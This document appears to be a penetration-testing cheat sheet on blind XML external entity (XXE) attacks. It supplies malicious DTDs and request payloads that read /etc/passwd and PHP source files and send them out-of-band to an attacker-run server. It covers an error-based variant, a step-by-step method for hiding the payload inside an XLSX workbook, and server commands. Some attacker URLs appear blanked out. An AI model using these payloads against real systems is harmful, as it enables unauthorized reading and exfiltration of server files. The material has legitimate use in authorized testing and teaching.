Blind XXE

Last modified: 2023-06-10


XXE is a type of vulnerability that allows an attacker to inject and execute malicious XML code on a server that parses XML input, without directly receiving any feedback or response from the server.

Data Exfiltration via Out-Of-Band

1. Create a Malicious DTD

We need to prepare the dtd file (named "exploit.dtd" here) to retrieve the target file.
Replace the ip address with your own.

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!-- <!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=index.php" -->
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM ';'>">

Then host it on web server.

sudo python3 -m http.server 80

2. Insert XXE

In http request body, insert the following XXE payload.
Same as above DTD, replace the ip address with your own

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM ""> %xxe;]>

Now send request. We might retrieve the local file of the target system via web server.

Data Exfiltration via Out-Of-Band (Error-based)

If the website shows error messages when performing XXE, we can use the following malicious DTD.

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">

For the rest, please refer to the section above.

Inside XLSX File

An XLSX file is a Microsoft Excel spreadsheet.

1. Create a XLSX File

First we need to create a XLSX file using some software such as LibreOffice Calc.

2. Extract the XLSX File

7z -oXXE xxe.xlsx
cd XXE

We should get files such as “.xml”.

3. Add Blind XXE Payload in the XML File.

Insert the following payload into the xl/workbook.xml.
Replace the “” with your local ip address.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE cdl [<!ELEMENT cdl ANY ><!ENTITY % asd SYSTEM "">%asd;%c;]>
<workbook xmlns="" xmlns:r="">

4. Rebuild the XLSX File.

cd XXE
7z u ../xxe.xlsx *

5. Create XXE inside a DTD File

Create “xxe.dtd”.
Replace “” with your local ip address.

<!ENTITY % d SYSTEM "file:///etc/passwd">
<!ENTITY % c "<!ENTITY rrr SYSTEM ';'>">

6. Start a local server

Serve the DTD file using xxeserv.

git clone
cd xxeserv
go mod init xxeftp.go
go build
go run xxeftp.go -o files.log -p 2121 -w -wd public -wp 8000

In another terminal, start a web server in the directory where “xxe.dtd” located.

sudo python3 -m http.server 80

Now upload “xxe.xlsx” file in the website. We should get the content of the desired file.